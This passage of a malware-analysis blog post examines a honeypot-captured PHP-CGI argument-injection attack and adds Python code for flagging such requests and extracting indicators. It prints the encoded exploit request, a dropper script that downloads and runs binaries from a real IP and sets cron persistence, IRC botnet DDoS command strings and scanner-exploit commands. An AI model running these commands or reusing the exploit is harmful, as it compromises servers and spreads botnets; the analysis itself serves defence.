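    "+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E"
    "+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22"
    "+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65"
    "+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74"
    "+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30"
    "+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%30"
    "+%%2D%%6E"
    " HTTP/1.1"
)

# Constructed log lines beside it: a benign request, a short option-only
# request (single-percent encoding) and a request with no query at all.
SAMPLE_LOG = [
    CAPTURED_REQUEST_LINE,
    "GET /index.php?page=home HTTP/1.1",
    "GET /cgi-bin/php.cgi?%2Dn HTTP/1.1",
    "GET /cgi-bin/php.cgi HTTP/1.0",
]


def decode_query(query: str) -> str:
    """Decode the query the way php-cgi sees it: '+' is a space and %XX is
    percent-decoded.  The captured request doubles every percent sign
    (%%2D); collapsing '%%' to '%' first handles both spellings."""
    return unquote(query.replace("%%", "%").replace("+", " "))


def analyse_request_line(line: str) -> dict:
    """Verdict for one request line.  A query string with no '=' reaches
    php-cgi as command-line arguments; if the decoded arguments start
    with '-', they are php-cgi options rather than a script argument."""
    m = REQUEST_LINE.match(line.strip())
    if not m or "?" not in m.group("target"):
        return {"suspicious": False}
    path, query = m.group("target").split("?", 1)
    if "=" in query:
        return {"suspicious": False}  # ordinary key=value query string
    tokens = decode_query(query).split()
    if not tokens or not tokens[0].startswith("-"):
        return {"suspicious": False}
    directives = {}
    for opt, val in zip(tokens, tokens[1:]):   # collect every "-d key=value"
        if opt == "-d":
            key, _, value = val.partition("=")
            directives[key] = value
    return {
        "suspicious": True,
        "path": path,
        "decoded": " ".join(tokens),
        "directives": directives,
        "flagged": {k: RISKY_DIRECTIVES[k] for k in directives if k in RISKY_DIRECTIVES},
    }


def scan_log(lines) -> list:
    """Return (line, verdict) for every request line that carries options."""
    hits = []
    for line in lines:
        verdict = analyse_request_line(line)
        if verdict["suspicious"]:
            hits.append((line, verdict))
    return hits


if __name__ == "__main__":
    for line, verdict in scan_log(SAMPLE_LOG):
        print(verdict["path"], "->", verdict["decoded"])
        for name, why in verdict["flagged"].items():
            print("   ", name, "=", verdict["directives"][name], "#", why)
```
<br />
Run over the captured line, the decoder yields the same eight -d directives the post's request carries, ending with -n; the "no '=' in the raw query string" test is the condition that turns the query into arguments, so it is the one to keep when turning this into a signature.<br />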
<br />
The payload is pretty straightforward: download and execute 'sh', which consists of a shell script:<br />
<pre class="brush: js">#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/shd -O ...i
chmod +x ...i
./...i
cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru
cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr
killall -9 .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w php
killall -9 .rnd
killall -9 .a
killall -9 kernelupdate
killall -9 dev
killall -9 sh
killall -9 bash
killall -9 apache2
killall -9 httpd
killall -9 cla
killall -9 ka
killall -9 kav
killall -9 m32
killall -9 m64
killall -9 perl
killall -9 sh
killall -9 sucrack
killall -9 m64 m32 minerd32 minerd64 minerd cla qt64 qt32 clover cron sh wget
kill -9 `pidof .rnd`
kill -9 `pidof .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w`
kill -9 `pidof dev`
kill -9 `pidof perl`
kill -9 `pidof m32`
kill -9 `pidof m64`
kill -9 `pidof ka`
kill -9 `pidof kav`
kill -9 `pidof cla`
kill -9 `pidof sh`
kill -9 `pidof sucrack`
echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
rm -rf /tmp/cron
</pre>
The script does a couple of things:<br />
<ul>
<li>Download and execute a file 'shd' </li>
<li>Download and execute files 'ru' and 'rr'</li>
<li>Try to kill 55 processes</li>
</ul>
Skipping ahead a few lines to the "kill" section: this was a big question mark for me for a while, as it didn't make any clear sense until I checked some of my honeypot logs and found that similar attacks from other actors downloaded and executed bots whose processes had the above names. The actor behind this attack has thereby planned ahead and makes sure to kill any known running bots, so that only one bot is running: his own.<br />
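For triage, the indicators a responder wants out of a dropper like 'sh' are its remote fetches, the staging directories it uses, the process names it kills and any persistence it sets up. The following is an added example (my own code, not the post's) that pulls these out of a captured script with a handful of regular expressions; the embedded script is a constructed excerpt of the one above, and the function name triage_dropper is mine.<br />
<br />
```python
"""Pull indicators out of a captured shell dropper: remote fetches,
staging directories, killed process names and cron persistence.
Added example, not the post's own tooling."""
import re

# Constructed excerpt of the 'sh' dropper shown in the post.
DROPPER = r'''#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/shd -O ...i
chmod +x ...i
./...i
cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru
cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr
killall -9 .a .b .c .d perl
killall -9 kernelupdate
kill -9 `pidof .rnd`
kill -9 `pidof sucrack`
echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
rm -rf /tmp/cron
'''

# A wget/curl invocation up to the next command separator.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;\n]*")
# An IP-based URL, with or without a scheme, as the dropper writes them.
URL_RE = re.compile(r"(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/[^\s;'\"]+")
# Process names passed to killall (optionally after a signal) or to pidof.
KILLALL_RE = re.compile(r"\bkillall\b(?:\s+-\d+)?\s+(.+)")
PIDOF_RE = re.compile(r"pidof\s+([^`)]+)")
# cron schedule keywords or a crontab call mark persistence.
CRON_RE = re.compile(r"@(?:reboot|hourly|daily|weekly|monthly|yearly|annually)\b|\bcrontab\b")
STAGING_DIRS = ("/tmp", "/dev/shm", "/var/tmp")


def triage_dropper(script: str) -> dict:
    """Summarise what a dropper script fetches, kills and persists."""
    downloads, killed, persistence, staging = [], set(), [], set()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for fetch in FETCH_RE.finditer(line):
            for url in URL_RE.findall(fetch.group(0)):
                if url not in downloads:          # keep first-seen order, no duplicates
                    downloads.append(url)
        for m in KILLALL_RE.finditer(line):
            killed.update(m.group(1).split())
        for m in PIDOF_RE.finditer(line):
            killed.update(m.group(1).split())
        for d in STAGING_DIRS:
            if d in line:
                staging.add(d)
        if CRON_RE.search(line):
            persistence.append(line)
    return {
        "downloads": downloads,
        "killed": sorted(killed),
        "persistence": persistence,
        "staging_dirs": sorted(staging),
    }


if __name__ == "__main__":
    for key, value in triage_dropper(DROPPER).items():
        print(key)
        for item in value:
            print("   ", item)
```
<br />
The download list is what to block and hunt for, the kill list doubles as a catalogue of other actors' bot names seen on the same hosts, and the persistence lines tell you where to look on a compromised box (here the user crontab, which the script overwrites with a weekly re-download).<br />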
<br />
Going back to the first few lines, the script will download and execute <b>'shd'</b> which is a compiled binary [VT: <a href="https://www.virustotal.com/en/file/58b992b81f68870b9cbd46b01f7a8e4eafb45c107ac7bf64e67c07954e6b5f88/analysis/">47640bbafbaef528bc3f3215299b9ed0</a>]. It doesn't take long to get an idea of what this binary does after checking the strings (full list on [<a href="http://pastebin.com/UaiDdNfC">Pastebin</a>]):<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
...<snip>...<br />
117.17.242.218<br />
NOTICE %s :Unable to comply.<br />
/usr/dict/words<br />
%s : USERID : UNIX : %s<br />
NOTICE %s :GET <host> <save as><br />
NOTICE %s :Unable to create socket.<br />
http://<br />
NOTICE %s :Unable to resolve address.<br />
NOTICE %s :Unable to connect to http.<br />
GET /%s HTTP/1.0<br />
Connection: Keep-Alive<br />
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)<br />
Host: %s:80<br />
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*<br />
Accept-Encoding: gzip<br />
Accept-Language: en<br />
Accept-Charset: iso-8859-1,*,utf-8<br />
...<snip>...<br />
NOTICE %s :MOVE <server><br />
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls<br />
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers<br />
NOTICE %s :UDP <target> <port> <secs> = A udp flooder<br />
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder<br />
NOTICE %s :NICK <nick> = Changes the nick of the client<br />
NOTICE %s :SERVER <server> = Changes servers<br />
NOTICE %s :GETSPOOFS = Gets the current spoofing<br />
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet<br />
NOTICE %s :DISABLE = Disables all packeting from this client<br />
NOTICE %s :ENABLE = Enables all packeting from this client<br />
NOTICE %s :KILL = Kills the client<br />
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd<br />
NOTICE %s :VERSION = Requests version of client<br />
NOTICE %s :KILLALL = Kills all current packeting<br />
NOTICE %s :HELP = Displays this<br />
NOTICE %s :IRC <command> = Sends this command to the server<br />
NOTICE %s :SH <command> = Executes a command<br />
NOTICE %s :Killing pid %d.</div>
A couple of things pop out. First is the fact that there is an IP address listed, <b>'117.17.242.218'</b>, and judging by the other strings I would guess that this is an IRC bot with DDoS functionality.<br />
<br />
One of my ad-hoc methods while analysing malware is to always check TCP/80, as it's the most commonly open port on the Internet:<br />
<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
$ curl 117.17.242.218<br />
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...<br />
:irc.foonet.com NOTICE AUTH :*** Found your hostname (cached)<br />
ERROR :Closing Link: [<excluded>] (HTTP command from IRC connection (ATTACK?))</div>
<br />
A channel could be found using strings as well:<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
$ strings shd | grep \#<br />
CL#CP<br />
Gu#1<br />
u#;u<br />
<b>#irc</b><br />
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<br />
|;#o</div>
<br />
The channel in question is not password-protected, but it doesn't list connected bots either, only the bot admin, who seems to change nickname each time a command is sent to one or more bots.<br />
<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
13:23 <@HADHH> !* SH cd /tmp;wget 221.132.37.26/ru.php ; bash ru.php ; rm -rf ru.php<br />
13:23 -!- HADHH is now known as HAD</div>
<br />
<div class="de2">
Moving forward with the second and third files, <b>'ru'</b> and <b>'rr'</b>, which are supposed to be bash scripts. <b>'rr'</b> however wasn't found on the server; <b>'ru'</b> was [<a href="http://pastebin.com/v7rjWrfe">Pastebin</a>].<br />
<br />
This script is the first step in spreading further, as it downloads and runs a scanning tool (pnscan) and the exploit from http://bont.hu/ar/<arch>.tgz, as shown in the snippet below:<br />
<br />
<pre class="brush: js"><snip>
if [ ! -f pnscan ];then
    case "$arch" in
    "x86_64")
        wget -q http://bont.hu/ar/64.tgz -O 64.tgz
        tar xvzf 64.tgz
        rm -rf 64.tgz
        ;;
    *)
        wget -q http://bont.hu/ar/86.tgz -O 86.tgz
        tar xvzf 86.tgz
        rm -rf 86.tgz
        ;;
    esac
fi
<snip>
</pre>
<br />
The archives come with three files each, which have identical functionality (the only difference in the 'run' file is a line break at the end):<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
86.tgz<br />
<a href="https://www.virustotal.com/en/file/0c30d700e6481a4269ebf03456e2edae84a6098e8f648f5e2e96a3eadb553629/analysis/">c11e9bc5faf9c2f1600f079ccab3387e</a> php <--- Exploit for PHP<br />
<a href="https://www.virustotal.com/en/file/cd77eae3ec2b85afd9c99e504b58be0e34de546dbbc86f52fa8512247690e522/analysis/">14e16be30cfe88ae67881b54b12c2cec</a> pnscan <--- Modified version of PnScan [<a href="http://www.lysator.liu.se/~pen/pnscan/">PnScan</a>]<br />
bebe8fc81a7c7b19bc80422e7fce04b6 run <--- Run the two above<br />
<br />
64.tgz<br />
<a href="https://www.virustotal.com/en/file/e63d7630975136486107f3d526a1f24ace64bc2ff55155cac6bcbc4b5dabb44c/analysis/">96e2c911b49f825f2faa3bfa9c6f96bd</a> php<br />
<a href="https://www.virustotal.com/en/file/e28e762a13d0ccda81567eb4865ae7b3b37952e66682175e85e72855a0db4700/analysis/">212342b3ddd21a534d0dd7df066ee78d</a> pnscan<br />
57dbd47859d067f6c4f60d65c486131f run</div>
The run script reveals how the process is initiated, but only how pnscan is started:<br />
<pre class="brush: js">#!/bin/bash
rand=`echo $((RANDOM%225+2))`
cd /dev/shm
nohup ./pnscan -rApache -w"HEAD / HTTP/1.0\r\n\r\n" $rand.0.0.0/8 80 > /dev/null &
</pre>
I approached this as if it were a standard version of pnscan that would dump the results to a file, but as the above script shows, there are no calls to 'php'. So back to static analysis: run strings and look for 'php':<br />
<div style="background: black; border: 1px solid grey; color: white; padding: 15px;">
$ strings pnscan | fgrep php<br />
./php --target %s --port 80 --protocol http --reverse-ip 12.8.8.8 --reverse-port 80 &</div>
<br />
Now that's more like it! It seems to be a modified version of pnscan which calls 'php' if a server is found to be running Apache.<br />
<br />
At this stage the whole process simply repeats for each vulnerable server.<br />
<br />
<b><i>Other thoughts and facts</i></b><br />
This particular attack has been running since November judging by <a href="http://humbug.me.uk/linux/trojan.htm">this article</a>, and the botnet is still propagating and actively being controlled by the admin. Some things have changed over time, such as the names of the scripts and binaries being downloaded (the old ones still remain though). Some examples (top one being the currently used) [<a href="http://urlquery.net/search.php?q=221.132.37.26&type=string&start=2013-11-17&end=2014-02-15&max=200">urlquery</a>]:<br />
<br />
Initial script (2014-02-15):<br />
221.132.37.26/shh - Active<br />
221.132.37.26/sh - Active<br />
221.132.37.26/scen - Active<br />
221.132.37.26/tmp/sh - Inactive<br />
<br />
IRC-bot (2014-02-15):<br />
221.132.37.26/shd - Active (2014-02-15)<br />
221.132.37.26/shb - Active<br />
221.132.37.26/shc - Active<br />
221.132.37.26/xxx - Inactive<br />
221.132.37.26/xx - Inactive<br />
221.132.37.26/x - Inactive<br />
<br />
Unknown (based on urlquery, all inactive):<br />
221.132.37.26/CUT_IT_OUT<br />
221.132.37.26/i_see_you<br />
221.132.37.26/in (probably initial script)<br />
<br />
<b>Honeypot used:</b><br />
I've uploaded the script used in capturing this and many similar attempts on Pastebin [<a href="http://pastebin.com/ue0SNiAy">Pastebin</a>].<br />
<br />
<b><i>Links</i></b><br />
http://blog.michaelhaag.org/2013/12/kaiten-linux-backdoor.html<br />
http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html<br />
http://malm0u53.blogspot.se/2013/12/backing-up-new-cis-blog-post.html
</div>